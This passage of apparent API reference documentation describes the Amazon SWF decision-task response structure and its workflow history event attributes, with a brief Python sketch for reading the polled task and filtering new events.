'startedEventId': 123
},
'decisionTaskTimedOutEventAttributes': {
'timeoutType': 'START_TO_CLOSE',
'scheduledEventId': 123,
'startedEventId': 123
},
'activityTaskScheduledEventAttributes': {
'activityType': {
'name': 'string',
'version': 'string'
},
'activityId': 'string',
'input': 'string',
'control': 'string',
'scheduleToStartTimeout': 'string',
'scheduleToCloseTimeout': 'string',
'startToCloseTimeout': 'string',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'decisionTaskCompletedEventId': 123,
'heartbeatTimeout': 'string'
},
'activityTaskStartedEventAttributes': {
'identity': 'string',
'scheduledEventId': 123
},
'activityTaskCompletedEventAttributes': {
'result': 'string',
'scheduledEventId': 123,
'startedEventId': 123
},
'activityTaskFailedEventAttributes': {
'reason': 'string',
'details': 'string',
'scheduledEventId': 123,
'startedEventId': 123
},
'activityTaskTimedOutEventAttributes': {
'timeoutType': 'START_TO_CLOSE'|'SCHEDULE_TO_START'|'SCHEDULE_TO_CLOSE'|'HEARTBEAT',
'scheduledEventId': 123,
'startedEventId': 123,
'details': 'string'
},
'activityTaskCanceledEventAttributes': {
'details': 'string',
'scheduledEventId': 123,
'startedEventId': 123,
'latestCancelRequestedEventId': 123
},
'activityTaskCancelRequestedEventAttributes': {
'decisionTaskCompletedEventId': 123,
'activityId': 'string'
},
'workflowExecutionSignaledEventAttributes': {
'signalName': 'string',
'input': 'string',
'externalWorkflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'externalInitiatedEventId': 123
},
'markerRecordedEventAttributes': {
'markerName': 'string',
'details': 'string',
'decisionTaskCompletedEventId': 123
},
'recordMarkerFailedEventAttributes': {
'markerName': 'string',
'cause': 'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'timerStartedEventAttributes': {
'timerId': 'string',
'control': 'string',
'startToFireTimeout': 'string',
'decisionTaskCompletedEventId': 123
},
'timerFiredEventAttributes': {
'timerId': 'string',
'startedEventId': 123
},
'timerCanceledEventAttributes': {
'timerId': 'string',
'startedEventId': 123,
'decisionTaskCompletedEventId': 123
},
'startChildWorkflowExecutionInitiatedEventAttributes': {
'workflowId': 'string',
'workflowType': {
'name': 'string',
'version': 'string'
},
'control': 'string',
'input': 'string',
'executionStartToCloseTimeout': 'string',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'decisionTaskCompletedEventId': 123,
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'taskStartToCloseTimeout': 'string',
'tagList': [
'string',
],
'lambdaRole': 'string'
},
'childWorkflowExecutionStartedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'initiatedEventId': 123
},
'childWorkflowExecutionCompletedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'result': 'string',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionFailedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'reason': 'string',
'details': 'string',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionTimedOutEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'timeoutType': 'START_TO_CLOSE',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionCanceledEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'details': 'string',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionTerminatedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'initiatedEventId': 123,
'startedEventId': 123
},
'signalExternalWorkflowExecutionInitiatedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'signalName': 'string',
'input': 'string',
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'externalWorkflowExecutionSignaledEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'initiatedEventId': 123
},
'signalExternalWorkflowExecutionFailedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'cause': 'UNKNOWN_EXTERNAL_WORKFLOW_EXECUTION'|'SIGNAL_EXTERNAL_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'initiatedEventId': 123,
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'externalWorkflowExecutionCancelRequestedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'initiatedEventId': 123
},
'requestCancelExternalWorkflowExecutionInitiatedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'requestCancelExternalWorkflowExecutionFailedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'cause': 'UNKNOWN_EXTERNAL_WORKFLOW_EXECUTION'|'REQUEST_CANCEL_EXTERNAL_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'initiatedEventId': 123,
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'scheduleActivityTaskFailedEventAttributes': {
'activityType': {
'name': 'string',
'version': 'string'
},
'activityId': 'string',
'cause': 'ACTIVITY_TYPE_DEPRECATED'|'ACTIVITY_TYPE_DOES_NOT_EXIST'|'ACTIVITY_ID_ALREADY_IN_USE'|'OPEN_ACTIVITIES_LIMIT_EXCEEDED'|'ACTIVITY_CREATION_RATE_EXCEEDED'|'DEFAULT_SCHEDULE_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_SCHEDULE_TO_START_TIMEOUT_UNDEFINED'|'DEFAULT_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_HEARTBEAT_TIMEOUT_UNDEFINED'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'requestCancelActivityTaskFailedEventAttributes': {
'activityId': 'string',
'cause': 'ACTIVITY_ID_UNKNOWN'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'startTimerFailedEventAttributes': {
'timerId': 'string',
'cause': 'TIMER_ID_ALREADY_IN_USE'|'OPEN_TIMERS_LIMIT_EXCEEDED'|'TIMER_CREATION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'cancelTimerFailedEventAttributes': {
'timerId': 'string',
'cause': 'TIMER_ID_UNKNOWN'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'startChildWorkflowExecutionFailedEventAttributes': {
'workflowType': {
'name': 'string',
'version': 'string'
},
'cause': 'WORKFLOW_TYPE_DOES_NOT_EXIST'|'WORKFLOW_TYPE_DEPRECATED'|'OPEN_CHILDREN_LIMIT_EXCEEDED'|'OPEN_WORKFLOWS_LIMIT_EXCEEDED'|'CHILD_CREATION_RATE_EXCEEDED'|'WORKFLOW_ALREADY_RUNNING'|'DEFAULT_EXECUTION_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_TASK_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_CHILD_POLICY_UNDEFINED'|'OPERATION_NOT_PERMITTED',
'workflowId': 'string',
'initiatedEventId': 123,
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'lambdaFunctionScheduledEventAttributes': {
'id': 'string',
'name': 'string',
'control': 'string',
'input': 'string',
'startToCloseTimeout': 'string',
'decisionTaskCompletedEventId': 123
},
'lambdaFunctionStartedEventAttributes': {
'scheduledEventId': 123
},
'lambdaFunctionCompletedEventAttributes': {
'scheduledEventId': 123,
'startedEventId': 123,
'result': 'string'
},
'lambdaFunctionFailedEventAttributes': {
'scheduledEventId': 123,
'startedEventId': 123,
'reason': 'string',
'details': 'string'
},
'lambdaFunctionTimedOutEventAttributes': {
'scheduledEventId': 123,
'startedEventId': 123,
'timeoutType': 'START_TO_CLOSE'
},
'scheduleLambdaFunctionFailedEventAttributes': {
'id': 'string',
'name': 'string',
'cause': 'ID_ALREADY_IN_USE'|'OPEN_LAMBDA_FUNCTIONS_LIMIT_EXCEEDED'|'LAMBDA_FUNCTION_CREATION_RATE_EXCEEDED'|'LAMBDA_SERVICE_NOT_AVAILABLE_IN_REGION',
'decisionTaskCompletedEventId': 123
},
'startLambdaFunctionFailedEventAttributes': {
'scheduledEventId': 123,
'cause': 'ASSUME_ROLE_FAILED',
'message': 'string'
}
},
],
'previousStartedEventId': 123,
'NextToken': 'string'
}
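The response syntax above maps directly onto a plain Python dict. As a rough sketch (the values below are hypothetical sample data, not real identifiers), a decider would obtain the dict from ``swf.poll_for_decision_task(domain=..., taskList={'name': ...})`` and read the key fields like this:

```python
# Truncated, hypothetical sample of the response shape documented below.
# A live decider would get this dict back from poll_for_decision_task.
sample_task = {
    "taskToken": "AAAA...truncated...",
    "startedEventId": 3,
    "workflowExecution": {"workflowId": "order-42", "runId": "abc123"},
    "workflowType": {"name": "ProcessOrder", "version": "1.0"},
    "events": [
        {"eventId": 1, "eventType": "WorkflowExecutionStarted"},
        {"eventId": 2, "eventType": "DecisionTaskScheduled"},
        {"eventId": 3, "eventType": "DecisionTaskStarted"},
    ],
}

# An empty taskToken means the long poll expired with no task available,
# so check it before doing any work with the response.
event_types = []
if sample_task["taskToken"]:
    workflow_id = sample_task["workflowExecution"]["workflowId"]
    event_types = [e["eventType"] for e in sample_task["events"]]
```

When ``NextToken`` is present in the response, the remaining history events can be fetched by passing it back on the next call.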
**Response Structure**
- *(dict) --*
A structure that represents a decision task. Decision tasks are sent to deciders in order for them to make decisions.
- **taskToken** *(string) --*
The opaque string used as a handle on the task. This token is used by workers to communicate progress and response information back to the system about the task.
- **startedEventId** *(integer) --*
The ID of the ``DecisionTaskStarted`` event recorded in the history.
- **workflowExecution** *(dict) --*
The workflow execution for which this decision task was created.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the workflow execution for which this decision task was created.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **events** *(list) --*
A paginated list of history events of the workflow execution. The decider uses this during the processing of the decision task.
- *(dict) --*
Event within a workflow execution. A history event can be one of these types:
* ``ActivityTaskCancelRequested`` – A ``RequestCancelActivityTask`` decision was received by the system.
* ``ActivityTaskCanceled`` – The activity task was successfully canceled.
* ``ActivityTaskCompleted`` – An activity worker successfully completed an activity task by calling RespondActivityTaskCompleted .
* ``ActivityTaskFailed`` – An activity worker failed an activity task by calling RespondActivityTaskFailed .
* ``ActivityTaskScheduled`` – An activity task was scheduled for execution.
* ``ActivityTaskStarted`` – The scheduled activity task was dispatched to a worker.
* ``ActivityTaskTimedOut`` – The activity task timed out.
* ``CancelTimerFailed`` – Failed to process CancelTimer decision. This happens when the decision isn't configured properly, for example no timer exists with the specified timer Id.
* ``CancelWorkflowExecutionFailed`` – A request to cancel a workflow execution failed.
* ``ChildWorkflowExecutionCanceled`` – A child workflow execution, started by this workflow execution, was canceled and closed.
* ``ChildWorkflowExecutionCompleted`` – A child workflow execution, started by this workflow execution, completed successfully and was closed.
* ``ChildWorkflowExecutionFailed`` – A child workflow execution, started by this workflow execution, failed to complete successfully and was closed.
* ``ChildWorkflowExecutionStarted`` – A child workflow execution was successfully started.
* ``ChildWorkflowExecutionTerminated`` – A child workflow execution, started by this workflow execution, was terminated.
* ``ChildWorkflowExecutionTimedOut`` – A child workflow execution, started by this workflow execution, timed out and was closed.
* ``CompleteWorkflowExecutionFailed`` – The workflow execution failed to complete.
* ``ContinueAsNewWorkflowExecutionFailed`` – The workflow execution failed to complete after being continued as a new workflow execution.
* ``DecisionTaskCompleted`` – The decider successfully completed a decision task by calling RespondDecisionTaskCompleted .
* ``DecisionTaskScheduled`` – A decision task was scheduled for the workflow execution.
* ``DecisionTaskStarted`` – The decision task was dispatched to a decider.
* ``DecisionTaskTimedOut`` – The decision task timed out.
* ``ExternalWorkflowExecutionCancelRequested`` – Request to cancel an external workflow execution was successfully delivered to the target execution.
* ``ExternalWorkflowExecutionSignaled`` – A signal, requested by this workflow execution, was successfully delivered to the target external workflow execution.
* ``FailWorkflowExecutionFailed`` – A request to mark a workflow execution as failed, itself failed.
* ``MarkerRecorded`` – A marker was recorded in the workflow history as the result of a ``RecordMarker`` decision.
* ``RecordMarkerFailed`` – A ``RecordMarker`` decision was returned as failed.
* ``RequestCancelActivityTaskFailed`` – Failed to process RequestCancelActivityTask decision. This happens when the decision isn't configured properly.
* ``RequestCancelExternalWorkflowExecutionFailed`` – Request to cancel an external workflow execution failed.
* ``RequestCancelExternalWorkflowExecutionInitiated`` – A request was made to request the cancellation of an external workflow execution.
* ``ScheduleActivityTaskFailed`` – Failed to process ScheduleActivityTask decision. This happens when the decision isn't configured properly, for example the activity type specified isn't registered.
* ``SignalExternalWorkflowExecutionFailed`` – The request to signal an external workflow execution failed.
* ``SignalExternalWorkflowExecutionInitiated`` – A request to signal an external workflow was made.
* ``StartActivityTaskFailed`` – A scheduled activity task failed to start.
* ``StartChildWorkflowExecutionFailed`` – Failed to process StartChildWorkflowExecution decision. This happens when the decision isn't configured properly, for example the workflow type specified isn't registered.
* ``StartChildWorkflowExecutionInitiated`` – A request was made to start a child workflow execution.
* ``StartTimerFailed`` – Failed to process StartTimer decision. This happens when the decision isn't configured properly, for example a timer already exists with the specified timer Id.
* ``TimerCanceled`` – A timer, previously started for this workflow execution, was successfully canceled.
* ``TimerFired`` – A timer, previously started for this workflow execution, fired.
* ``TimerStarted`` – A timer was started for the workflow execution due to a ``StartTimer`` decision.
* ``WorkflowExecutionCancelRequested`` – A request to cancel this workflow execution was made.
* ``WorkflowExecutionCanceled`` – The workflow execution was successfully canceled and closed.
* ``WorkflowExecutionCompleted`` – The workflow execution was closed due to successful completion.
* ``WorkflowExecutionContinuedAsNew`` – The workflow execution was closed and a new execution of the same type was created with the same workflowId.
* ``WorkflowExecutionFailed`` – The workflow execution closed due to a failure.
* ``WorkflowExecutionSignaled`` – An external signal was received for the workflow execution.
* ``WorkflowExecutionStarted`` – The workflow execution was started.
* ``WorkflowExecutionTerminated`` – The workflow execution was terminated.
* ``WorkflowExecutionTimedOut`` – The workflow execution was closed because a time out was exceeded.
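A decider typically scans the history for events recorded since its last completed decision task and dispatches on the ``eventType`` values listed above. A minimal sketch (the history entries are hypothetical sample data):

```python
def new_events_since_last_decision(events):
    # Events with an eventId greater than that of the most recent
    # DecisionTaskCompleted event are the ones this decision task
    # has not yet responded to.
    last_completed = max(
        (e["eventId"] for e in events
         if e["eventType"] == "DecisionTaskCompleted"),
        default=0,
    )
    return [e for e in events if e["eventId"] > last_completed]

# Hypothetical history for a freshly started execution.
history = [
    {"eventId": 1, "eventType": "WorkflowExecutionStarted"},
    {"eventId": 2, "eventType": "DecisionTaskScheduled"},
    {"eventId": 3, "eventType": "DecisionTaskStarted"},
]
pending = new_events_since_last_decision(history)
```

With no ``DecisionTaskCompleted`` event yet in the history, all events are pending, and the decider would respond to the ``WorkflowExecutionStarted`` event (for example by scheduling the first activity task).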
- **eventTimestamp** *(datetime) --*
The date and time when the event occurred.
- **eventType** *(string) --*
The type of the history event.
- **eventId** *(integer) --*
The system generated ID of the event. This ID uniquely identifies the event within the workflow execution history.
- **workflowExecutionStartedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **input** *(string) --*
The input provided to the workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The maximum duration for this workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration of decision tasks for this workflow type.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions if this workflow execution is terminated, by calling the TerminateWorkflowExecution action explicitly or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **taskList** *(dict) --*
The name of the task list for scheduling the decision tasks for this workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority of the decision tasks in the workflow execution.
- **workflowType** *(dict) --*
The workflow type of this execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **tagList** *(list) --*
The list of tags associated with this workflow execution. An execution can have up to 5 tags.
- *(string) --*
- **continuedExecutionRunId** *(string) --*
If this workflow execution was started due to a ``ContinueAsNewWorkflowExecution`` decision, then it contains the ``runId`` of the previous workflow execution that was closed and continued as this execution.
- **parentWorkflowExecution** *(dict) --*
The source workflow execution that started this workflow execution. The member isn't set if the workflow execution was not started by a workflow.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **parentInitiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this workflow execution. The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **lambdaRole** *(string) --*
The IAM role attached to the workflow execution.
- **workflowExecutionCompletedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **result** *(string) --*
The result produced by the workflow execution upon successful completion.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CompleteWorkflowExecution`` decision to complete this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **completeWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``CompleteWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CompleteWorkflowExecution`` decision to complete this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The descriptive reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``FailWorkflowExecution`` decision to fail this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **failWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``FailWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``FailWorkflowExecution`` decision to fail this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionTimedOutEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of timeout that caused this event.
- **childPolicy** *(string) --*
The policy used for the child workflow executions of this workflow execution.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **workflowExecutionCanceledEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **details** *(string) --*
The details of the cancellation.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cancelWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``CancelWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionContinuedAsNewEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionContinuedAsNew`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **input** *(string) --*
The input provided to the new workflow execution.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``ContinueAsNewWorkflowExecution`` decision that started this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **newExecutionRunId** *(string) --*
The ``runId`` of the new workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The total duration allowed for the new workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskList** *(dict) --*
The task list to use for the decisions of the new (continued) workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority of the task to use for the decisions of the new (continued) workflow execution.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration of decision tasks for the new workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions of the new execution if it is terminated by calling the TerminateWorkflowExecution action explicitly or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **tagList** *(list) --*
The list of tags associated with the new workflow execution.
- *(string) --*
- **workflowType** *(dict) --*
The workflow type of this execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **lambdaRole** *(string) --*
The IAM role to attach to the new (continued) workflow execution.
- **continueAsNewWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``ContinueAsNewWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``ContinueAsNewWorkflowExecution`` decision that started this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionTerminatedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionTerminated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The reason provided for the termination.
- **details** *(string) --*
The details provided for the termination.
- **childPolicy** *(string) --*
The policy used for the child workflow executions of this workflow execution.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **cause** *(string) --*
If set, indicates that the workflow execution was automatically terminated, and specifies the cause. This happens if the parent workflow execution times out or is terminated and the child policy is set to terminate child executions.
- **workflowExecutionCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **externalWorkflowExecution** *(dict) --*
The external workflow execution for which the cancellation was requested.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **externalInitiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this workflow execution. The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cause** *(string) --*
If set, indicates that the request to cancel the workflow execution was automatically generated, and specifies the cause. This happens if the parent workflow execution times out or is terminated, and the child policy is set to cancel child executions.
- **decisionTaskScheduledEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskScheduled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **taskList** *(dict) --*
The name of the task list in which the decision task was scheduled.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
A task priority that, if set, specifies the priority for this decision task. Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **startToCloseTimeout** *(string) --*
The maximum duration for this decision task. The task is considered timed out if it doesn't complete within this duration.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **decisionTaskStartedEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **identity** *(string) --*
Identity of the decider making the request. This enables diagnostic tracing when problems arise. The form of this identity is user defined.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **executionContext** *(string) --*
User defined context for the workflow execution.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``DecisionTaskStarted`` event recorded when this decision task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskTimedOutEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of timeout that expired before the decision task could be completed.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``DecisionTaskStarted`` event recorded when this decision task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskScheduledEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskScheduled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityType** *(dict) --*
The type of the activity task.
- **name** *(string) --*
The name of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **version** *(string) --*
The version of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **activityId** *(string) --*
The unique ID of the activity task.
- **input** *(string) --*
The input provided to the activity task.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks. This data isn't sent to the activity.
- **scheduleToStartTimeout** *(string) --*
The maximum amount of time the activity task can wait to be assigned to a worker.
- **scheduleToCloseTimeout** *(string) --*
The maximum amount of time for this activity task.
- **startToCloseTimeout** *(string) --*
The maximum amount of time a worker may take to process the activity task.
- **taskList** *(dict) --*
The task list in which the activity task has been scheduled.
- **name** *(string) --*
